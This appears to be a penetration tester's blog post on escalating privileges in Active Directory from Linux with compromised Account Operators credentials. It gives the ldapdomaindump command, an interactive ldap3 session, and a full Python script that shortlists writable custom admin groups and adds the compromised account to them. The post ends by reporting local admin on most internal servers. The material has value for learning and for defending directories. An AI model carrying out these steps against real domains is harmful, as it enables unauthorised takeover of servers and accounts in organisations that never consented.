I recently came across a peculiar scenario that caused me to have to think a little outside the box.
I was able to obtain credentials for an account that was part of the “Account Operators” group. Here is Microsoft’s description of that group:
The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.
Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights.
While they cannot directly modify the membership of administrators or the built-in administrative groups, they can modify any other group. It is not uncommon for Active Directory administrators to create groups outside of the default admin groups and grant them administrative privileges, such as local administrator rights on servers. These groups we can modify as an Account Operator. One caveat: a custom group that has been nested inside a protected group such as Domain Admins gets adminCount=1 and has its ACL overwritten by SDProp (the AdminSDHolder mechanism), after which Account Operators can no longer write to it, so the useful targets are usually groups that were granted rights directly rather than through nesting.
While this is easy to do with Active Directory Users and Computers, I had no such access. I did not have shell access on a single Windows machine. While Account Operators can log onto Domain Controllers locally, that does not include Remote Desktop. I had to modify Active Directory group membership using only Linux.
My first course of action was to extract as much domain information as I could using ldapdomaindump.
You use it like so:
ldapdomaindump -u DOMAIN\\USER -p PASSWORD DC
I will then run:
grep '"dn"' domain_groups.json
To get the Distinguished Names (DN) of all the groups.
Based on the Common Name (CN), and the description attribute when one is set, you should be able to get an idea of what a group does and whether it might grant additional rights. Groups with adminCount set to 1 are protected by AdminSDHolder and are not writable by Account Operators, so skip those.
To actually modify those groups, you can use the ldap3 library.
pip install ldap3
After you have that installed, run python:
>>> import ldap3
>>> user = 'USERNAME'
>>> password = 'PASSWORD'
>>> server = ldap3.Server('DC')
>>> connection = ldap3.Connection(server, user='DOMAIN\\' + user, password=password)
>>> connection.bind()
True
Here DC is the domain controller's hostname or IP, the same one given to ldapdomaindump. This is a simple bind, so the password crosses the wire in clear text; use ldap3.Server('DC', use_ssl=True) (LDAPS on 636) where you can, and note that a DC that enforces LDAP signing will refuse a plain simple bind. If bind() returns False, connection.result tells you why.
After that is successful, you can start modifying groups. You will also need the DN of the user account you wish to add to the group, and you can get that from the LDAP dump as well (domain_users.json).
Put the user DN and group DN into variables:
>>> user_dn = 'USER_DN'
>>> group_dn = 'GROUP_DN'
Then use this import:
>>> from ldap3.extend.microsoft.addMembersToGroups import ad_add_members_to_groups as addUsersInGroups
Then you can run:
>>> addUsersInGroups(connection, user_dn, group_dn)
True
This adds that user to the specified group. If it fails it returns False (newer ldap3 versions raise an exception instead unless you pass raise_error=False), and connection.result['description'] holds the server's reason: insufficientAccessRights means you lack write access to that group's member attribute, so try a different one.
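As an added example (not code from the original post), here is how I would script the two steps above: reading ldapdomaindump's domain_groups.json to shortlist groups an Account Operator can actually write to, and issuing the same LDAP modify that ad_add_members_to_groups sends while keeping the server's reason for a failure. The JSON shape, group names and keyword list are assumptions; the sample dump is constructed, and add_member expects an already-bound ldap3 Connection.

```python
import json

# Constructed sample in the shape ldapdomaindump writes to domain_groups.json
# (one object per group with "dn" and "attributes"); the real file carries more
# keys, which this code ignores. Not a real dump.
SAMPLE_GROUPS_JSON = json.dumps([
    {"dn": "CN=Domain Admins,CN=Users,DC=corp,DC=example",
     "attributes": {"cn": "Domain Admins", "adminCount": 1,
                    "member": ["CN=Administrator,CN=Users,DC=corp,DC=example"]}},
    {"dn": "CN=Account Operators,CN=Builtin,DC=corp,DC=example",
     "attributes": {"cn": "Account Operators", "adminCount": 1}},
    {"dn": "CN=SRV-LocalAdmins,OU=Groups,DC=corp,DC=example",
     "attributes": {"cn": "SRV-LocalAdmins",
                    "description": ["Local administrators on all application servers"]}},
    # Nested under Domain Admins at some point, so SDProp stamped adminCount=1.
    {"dn": "CN=Helpdesk Tier2,OU=Groups,DC=corp,DC=example",
     "attributes": {"cn": "Helpdesk Tier2", "adminCount": 1,
                    "description": ["Helpdesk admins"]}},
    {"dn": "CN=SQL-DBA,OU=Groups,DC=corp,DC=example",
     "attributes": {"cn": "SQL-DBA", "description": ["Sysadmin on all SQL Server instances"]}},
    {"dn": "CN=Sales,OU=Groups,DC=corp,DC=example",
     "attributes": {"cn": "Sales"}},
])

# Built-in groups Microsoft says Account Operators cannot manage. They are also
# adminCount=1, but the name list catches them on a dump without that attribute.
PROTECTED_BUILTINS = {
    "Administrators", "Server Operators", "Account Operators",
    "Backup Operators", "Print Operators",
}

# Assumed heuristic: words that suggest a custom group carries admin rights somewhere.
INTERESTING = ("admin", "local", "server", "srv", "rdp", "sql", "infra", "ops")


def _first(value, default=""):
    """Single-valued attributes arrive as scalars, multi-valued ones as lists."""
    if isinstance(value, list):
        return value[0] if value else default
    return default if value is None else value


def load_groups(dump_text):
    """Parse the JSON list of group entries and yield (dn, attributes) pairs."""
    for entry in json.loads(dump_text):
        yield entry["dn"], entry.get("attributes", {})


def is_writable_by_account_operators(cn, attrs):
    """Account Operators have no write access on AdminSDHolder-protected objects
    (adminCount=1) and never had it on the listed built-in groups."""
    if cn in PROTECTED_BUILTINS:
        return False
    return int(_first(attrs.get("adminCount"), 0) or 0) != 1


def triage_groups(dump_text):
    """Return [(dn, reason)] for groups worth trying, most keyword hits first."""
    scored = []
    for dn, attrs in load_groups(dump_text):
        cn = _first(attrs.get("cn"))
        if not is_writable_by_account_operators(cn, attrs):
            continue
        desc = attrs.get("description") or []
        desc = desc if isinstance(desc, list) else [desc]
        text = " ".join([cn] + desc).lower()
        hits = [w for w in INTERESTING if w in text]
        if hits:
            scored.append((len(hits), dn, "name/description mentions " + ", ".join(hits)))
    scored.sort(key=lambda s: -s[0])  # stable sort keeps dump order among ties
    return [(dn, reason) for _, dn, reason in scored]


def build_add_member_change(user_dn):
    """The modify payload ad_add_members_to_groups issues under the hood;
    ldap3's MODIFY_ADD constant is the literal string 'MODIFY_ADD'."""
    return {"member": [("MODIFY_ADD", [user_dn])]}


def add_member(connection, user_dn, group_dn):
    """Issue the modify on a bound ldap3 Connection and return
    (succeeded, result description). On AD, 'insufficientAccessRights' means
    this group is not writable; 'entryAlreadyExists' means the user was already
    a member, which still proves the group is writable."""
    ok = connection.modify(group_dn, build_add_member_change(user_dn))
    return ok, connection.result.get("description")


if __name__ == "__main__":
    for dn, reason in triage_groups(SAMPLE_GROUPS_JSON):
        print(dn, "->", reason)
```

Run the triage first, then feed each candidate DN to add_member and keep any that return True or 'entryAlreadyExists'; the usual reason for a False is insufficientAccessRights, which is the DC telling you Account Operators cannot write that group.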
To validate that the user was added, list that user's groups:
>>> connection.search(search_base='DC=DOMAIN,DC=com', search_filter='(&(objectClass=user)(sAMAccountName=' + user + '))', search_scope='SUBTREE', attributes=['memberOf'])
True
>>> for memb in connection.entries[0].memberOf.values: print(memb.partition(',')[0].partition('=')[2])
With the user variable corresponding to the username (sAMAccountName) and search_base set to your domain's DN. This prints the CN of every group the account is a direct member of; your newly added group should be in that list. Note that memberOf lists direct memberships only and omits the primary group, normally Domain Users.
In my case, I was able to add the compromised account to multiple custom groups, which gave me local admin on most internal servers.